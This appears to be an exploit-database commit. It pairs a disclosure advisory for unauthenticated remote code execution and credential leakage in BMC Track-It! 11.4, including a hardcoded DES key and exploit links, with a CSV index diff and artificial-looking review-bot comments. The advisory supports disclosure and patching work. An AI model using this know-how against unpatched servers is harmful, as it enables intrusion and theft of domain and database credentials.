BMC Track-It! exposes several .NET remoting services on port 9010. .NET remoting is a remote method technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result.
These remote methods are used when a technician uses the Track-It! client console to communicate with the central Track-It! server. A technician would invoke these methods for obtaining tickets, creating a new ticket, uploading files to tickets, etc.
On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due
to the Track-It! server accepting remote method invocations without any kind of authentication or encryption. The vulnerabilities were very severe: one allowed an attacker to execute code on the server as NETWORK SERVICE or SYSTEM, while the other would allow an attacker to obtain the domain administrator and SQL server passwords if the Track-It! server had password reset turned on.
These vulnerabilities were discovered in a trivial manner - simply by turning Wireshark on and observing the packets one could see the remote method invocations and objects being passed around. Duplicate and even triplicate packets would not be rejected by the server, which would execute whatever action was requested in the packet.
Disclosure was done by the US-CERT, which attempted to contact BMC but received no response after 45 days. After this period they released the vulnerability information and I released two Metasploit exploits.
BMC contacted me asking for advice on how to fix the issues, to which I responded:
"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is to implement authentication and authorisation. There is no other way to fix it.
[...] Make sure the auth is done properly. You will have to negotiate some kind of session key using the user's credential at the start and use that session key for encryption going forward. Do not use a fixed key, as this can be reverse engineered.
If you don't implement such mechanism, it's just a question of time before someone else breaks your protection and finds new vulnerabilities."
On December 9th 2014, BMC released Track-It! 11.4 [2], which they claimed had fixed the security vulnerabilities.
At first glance, this seemed to be true. Traffic in Wireshark did seem to be encrypted. However upon further inspection, it became obvious that while the actual method invocation and its arguments were being encrypted using a DES key, there was still no authentication being done.
What this means in practice is that anyone can negotiate a new encryption key with the server and use that from then on to invoke remote methods without ever authenticating to the server, even for the initial encryption key exchange.
The code can be inspected by decompiling TrackIt.Utility.Common.dll. The interesting part is in:
namespace TrackIt.Utility.Common.Remoting
{
internal enum SecureTransaction
{
Uninitialized,
SendingPublicKey,
SendingSharedKey,
SendingEncryptedMessage,
SendingEncryptedResult,
UnknownIdentifier,
UnauthenticatedClient
}
}
This represents the state machine that the server uses to track client requests. The initial state is UnauthenticatedClient for any unknown client. A typical communication would be as follows:
1- Client generates a RSA key, which it shares with the server by sending a Modulus and an Exponent.
2- Server creates a DES key and sends that key back to the client
3- Client and server now share an encryption key; that key is used to pass back messages back and forth (states SendingEncryptedMessage and SendingEncryptedResult).
As it is evident, at no point there is any authentication or credentials being passed from the client to the server. So while all traffic is encrypted, anyone can negotiate an encryption key with the server and invoke any remote method.
From here on, building an exploit is trivial. All that is needed is to import the library DLL's from the Track-It! client application and invoke the methods in the code.
A special thanks to SecuriTeam Secure Disclosure (SSD), which have assisted me in disclosing this vulnerability to BMC. Their advisory can be found at https://blogs.securiteam.com/index.php/archives/2713.
Exploit code for this vulnerability has been released, and can be found in the same github repository as this advisory [3].
>> Technical details:
#1
Vulnerability: Remote code execution via file upload
CVE-2016-6598
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM.
#2
Vulnerability: Domain administrator and SQL server user credentials disclosure
CVE-2016-6599
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments.
>> Fix:
Upgrade to BMC Track-It! 11.5 or above.
>> References:
[1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt
[2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available
[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43883.zip)
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
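Review bot: The ">> Fix:" section says only "Upgrade to BMC Track-It! 11.5 or above", yet the background explains that 11.4 was also announced as fixed and turned out to add DES encryption without any authentication. State whether 11.5 adds authentication to the .NET remoting services on port 9010 and how that was confirmed, and consider a line advising that port 9010 be reachable only from technician consoles. Smaller points: reference [3] gives the EDB mirror as "//github.com/..." with no scheme, and the sentence beginning "On October 2014" is broken across two lines mid-sentence.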

@ -643,7 +643,7 @@ id,file,description,date,author,type,platform,port
4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)",2007-09-08,rgod,dos,windows,
4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,dos,windows,
4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,dos,windows,
4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware,
4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware,
4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",dos,multiple,
4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,dos,windows,
4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,dos,windows,
@ -786,7 +786,7 @@ id,file,description,date,author,type,platform,port
6372,exploits/windows/dos/6372.html,"Google Chrome 0.2.149.27 - A HREF Denial of Service",2008-09-05,Shinnok,dos,windows,
6386,exploits/windows/dos/6386.html,"Google Chrome 0.2.149.27 - Inspect Element Denial of Service",2008-09-05,Metacortex,dos,windows,
6391,exploits/windows/dos/6391.html,"Flock Social Web Browser 1.2.5 - 'loop' Remote Denial of Service",2008-09-06,LiquidWorm,dos,windows,
6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware,
6394,exploits/hardware/dos/6394.pl,"Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)",2008-09-07,"Alex Hernandez",dos,hardware,
6424,exploits/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service",2008-09-11,"Jeremy Brown",dos,windows,
6434,exploits/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 - Unicode Remote Denial of Service (PoC)",2008-09-11,LiquidWorm,dos,windows,
6458,exploits/windows/dos/6458.c,"The Personal FTP Server 6.0f - RETR Denial of Service",2008-09-14,Shinnok,dos,windows,
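Review bot: the renamed title for 6394 still reads "Remote Denial of Service Denial of Service (PoC)"; the phrase is duplicated in both the old and the new row. Since the row is being edited for the HTTPd casing anyway, drop the second "Denial of Service" in the same change.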
@ -1897,7 +1897,7 @@ id,file,description,date,author,type,platform,port
16193,exploits/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,dos,windows,
16204,exploits/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,dos,windows,
16190,exploits/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16191,exploits/windows/dos/16191.pl,"Novell ZenWorks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16191,exploits/windows/dos/16191.pl,"Novell ZENworks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows,
16192,exploits/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,linux,
16254,exploits/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,dos,windows,
16203,exploits/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,dos,windows,
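Review bot: row 16191 is titled "Remote Code Execution" while its path (exploits/windows/dos/) and type column both say dos, and the ZENworks casing fix leaves that mismatch in place (the unchanged rows 16190 and 16192 around it have the same issue). Anyone filtering the CSV by type to triage exposure will mis-rank these; either add "(PoC)" to the title or re-file the entry so title and type agree.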
@ -2312,7 +2312,7 @@ id,file,description,date,author,type,platform,port
19507,exploits/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",dos,solaris,
19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,
19531,exploits/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",dos,hardware,
19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple,
19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple,
19541,exploits/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",dos,novell,
19562,exploits/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",dos,windows,
19563,exploits/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",dos,windows,
@ -2510,7 +2510,7 @@ id,file,description,date,author,type,platform,port
20655,exploits/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,dos,windows,
20656,exploits/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,dos,windows,
20659,exploits/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",dos,multiple,
20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,dos,windows,
20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service",2001-02-28,joetesta,dos,windows,
20664,exploits/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",dos,windows,
20681,exploits/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,dos,windows,
20682,exploits/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,dos,windows,
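Review bot: the new title for 20662 has a mismatched quote, 'GET_ Denial of Service, opening with an apostrophe and closing with an underscore. It should read 'GET' Denial of Service to match the quoting applied to the other method names in this commit (for example 'PUT' in 17669).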
@ -2526,7 +2526,7 @@ id,file,description,date,author,type,platform,port
20750,exploits/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",dos,linux,
20753,exploits/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",dos,cgi,
20763,exploits/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",dos,windows,
20770,exploits/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,dos,windows,
20770,exploits/windows/dos/20770.txt,"GoAhead Web Server 2.1 (Windows) - Denial of Service",2001-04-17,nemesystm,dos,windows,
20771,exploits/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,dos,windows,
20779,exploits/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,dos,windows,
20783,exploits/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,dos,windows,
@ -2602,7 +2602,7 @@ id,file,description,date,author,type,platform,port
21177,exploits/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",dos,windows,
40757,exploits/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 - MSHTML CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,dos,windows,
21181,exploits/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",dos,multiple,
21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux,
21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux,
21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple,
21224,exploits/linux_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,linux_x86-64,
21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows,
@ -3160,7 +3160,7 @@ id,file,description,date,author,type,platform,port
24042,exploits/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",dos,windows,
24051,exploits/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",dos,windows,
24066,exploits/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",dos,multiple,
24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple,
24070,exploits/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",dos,multiple,
24078,exploits/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,dos,linux,
24080,exploits/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,dos,windows,
24095,exploits/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)",2004-05-06,"Joel Eriksson",dos,linux,
@ -3515,7 +3515,7 @@ id,file,description,date,author,type,platform,port
27211,exploits/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,dos,multiple,
27212,exploits/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",dos,multiple,
27232,exploits/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",dos,hardware,
27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,dos,hardware,
27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service",2006-02-16,l0om,dos,hardware,
27246,exploits/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,dos,linux,
27253,exploits/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",dos,linux,
27257,exploits/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",dos,linux,
@ -5260,6 +5260,7 @@ id,file,description,date,author,type,platform,port
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware,
43891,exploits/hardware/dos/43891.txt,"Lorex LH300 Series - ActiveX Buffer Overflow (PoC)",2015-01-18,"Pedro Ribeiro",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
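Review bot: the added row 43891 files an ActiveX buffer overflow under exploits/hardware/dos/ with platform hardware, whereas the other ActiveX entry visible in this file's diff (43120, "Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow") is filed as dos,windows. Please confirm which component actually crashes and align the platform column, otherwise a search by platform will miss one of the two.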
@ -5782,7 +5783,7 @@ id,file,description,date,author,type,platform,port
43060,exploits/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge < 2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",dos,windows,
43111,exploits/multiple/dos/43111.py,"GraphicsMagick - Memory Disclosure / Heap Overflow",2017-11-03,SecuriTeam,dos,multiple,
43115,exploits/windows/dos/43115.py,"Ipswitch WS_FTP Professional < 12.6.0.3 - Local Buffer Overflow (SEH)",2017-11-03,"Kevin McGuigan",dos,windows,
43119,exploits/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
43119,exploits/hardware/dos/43119.py,"Debut Embedded HTTPd 1.20 - Denial of Service",2017-11-02,z00n,dos,hardware,
43120,exploits/windows/dos/43120.txt,"Avaya IP Office (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,dos,windows,
43124,exploits/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,dos,windows,
43131,exploits/windows/dos/43131.html,"Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free",2017-11-09,"Google Security Research",dos,windows,
@ -7362,7 +7363,7 @@ id,file,description,date,author,type,platform,port
17966,exploits/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,local,windows,
17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows,
17985,exploits/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,local,windows,
18040,exploits/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux,
18040,exploits/linux/local/18040.c,"X.Org xorg 1.4 < 1.11.2 - File Permission Change",2011-10-28,vladz,local,linux,
18027,exploits/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Local Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,local,windows,
18038,exploits/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Local Buffer Overflow (Metasploit)",2011-10-26,Metasploit,local,windows,
18064,exploits/linux/local/18064.sh,"Calibre E-Book Reader - Local Privilege Escalation (1)",2011-11-02,zx2c4,local,linux,
@ -9172,9 +9173,10 @@ id,file,description,date,author,type,platform,port
43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows,
43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows,
43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows,
43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
43878,exploits/multiple/local/43878.md,"Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape",2018-01-24,SecuriTeam,local,multiple,
43879,exploits/windows/local/43879.txt,"Blizzard Update Agent - JSON RPC DNS Rebinding",2018-01-23,"Google Security Research",local,windows,1120
43887,exploits/multiple/local/43887.txt,"ICU library 52 < 54 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",local,multiple,
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,
40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
@ -10311,7 +10313,7 @@ id,file,description,date,author,type,platform,port
4715,exploits/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",remote,windows,
4720,exploits/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,remote,windows,
4724,exploits/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,remote,windows,80
4744,exploits/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,
4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows,
4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows,
4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows,
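Review bot: the new title for 4744 spells the product "GoAhead WebServer", while the same commit renames 20770 to "GoAhead Web Server 2.1 (Windows)" and row 21707 already uses "GoAhead Web Server". Use one spelling so a product search returns all three rows. The title also says only "Disclosure" without stating what is disclosed; a word such as "Information" or "Credentials" would help.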
@ -10381,7 +10383,7 @@ id,file,description,date,author,type,platform,port
5205,exploits/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Remote Buffer Overflow",2008-02-29,Elazar,remote,windows,
5212,exploits/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,remote,windows,
5213,exploits/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",remote,windows,
5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple,
5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,remote,multiple,
5224,exploits/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,remote,linux,
5228,exploits/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",remote,windows,
5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",remote,windows,
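Review bot: row 5215 is edited to change "Httpd" to "HTTPd" but keeps "WEBick", which is a misspelling of Ruby's WEBrick server. Fix the product name in the same edit so the entry is found when searching for WEBrick.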
@ -11825,7 +11827,7 @@ id,file,description,date,author,type,platform,port
17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows,
17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows,
17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware,
17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows,
17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow",2011-08-15,nion,remote,windows,
17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows,
17691,exploits/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,remote,multiple,
17692,exploits/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,remote,windows,
@ -12063,7 +12065,7 @@ id,file,description,date,author,type,platform,port
19247,exploits/linux/remote/19247.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (3)",1999-06-15,"eeye security",remote,linux,
19248,exploits/windows/remote/19248.c,"Microsoft IIS 4.0 - Remote Buffer Overflow (4)",1999-06-15,"Greg Hoglund",remote,windows,
19251,exploits/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four / Zero Header Length",1999-06-16,badi,remote,linux,
19253,exploits/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,remote,linux,
19253,exploits/linux/remote/19253.txt,"Debian 2.1 - HTTPd",1999-06-17,anonymous,remote,linux,
19266,exploits/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Remote Stack Overflow",2012-06-18,modpr0be,remote,windows,
19288,exploits/windows/remote/19288.py,"HP Data Protector Client - EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",remote,windows,
19291,exploits/windows/remote/19291.rb,"EZHomeTech EzServer 6.4.017 - Remote Stack Buffer Overflow (Metasploit)",2012-06-19,Metasploit,remote,windows,
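Review bot: the title for 19253 changes from "Debian 2.1 - httpd" to "Debian 2.1 - HTTPd" and still names no vulnerability class, unlike every neighbouring row in the hunk. While the row is being touched, add the issue type after the product so the entry is usable for triage.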
@ -12485,7 +12487,7 @@ id,file,description,date,author,type,platform,port
20430,exploits/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",remote,cgi,
20433,exploits/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",remote,cgi,
20434,exploits/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",remote,cgi,
20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,remote,cgi,
20435,exploits/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing",1996-04-01,@stake,remote,cgi,
20441,exploits/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",remote,multiple,
20442,exploits/cgi/remote/20442.html,"Greg Matthews - 'Classifieds.cgi' 1.0 Hidden Variable",1998-12-15,anonymous,remote,cgi,
20444,exploits/cgi/remote/20444.txt,"Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter",1998-12-15,anonymous,remote,cgi,
@ -12995,7 +12997,7 @@ id,file,description,date,author,type,platform,port
40347,exploits/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow",2002-09-17,"Solar Eclipse",remote,unix,80
21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows,
21677,exploits/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,remote,solaris,
21678,exploits/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris,
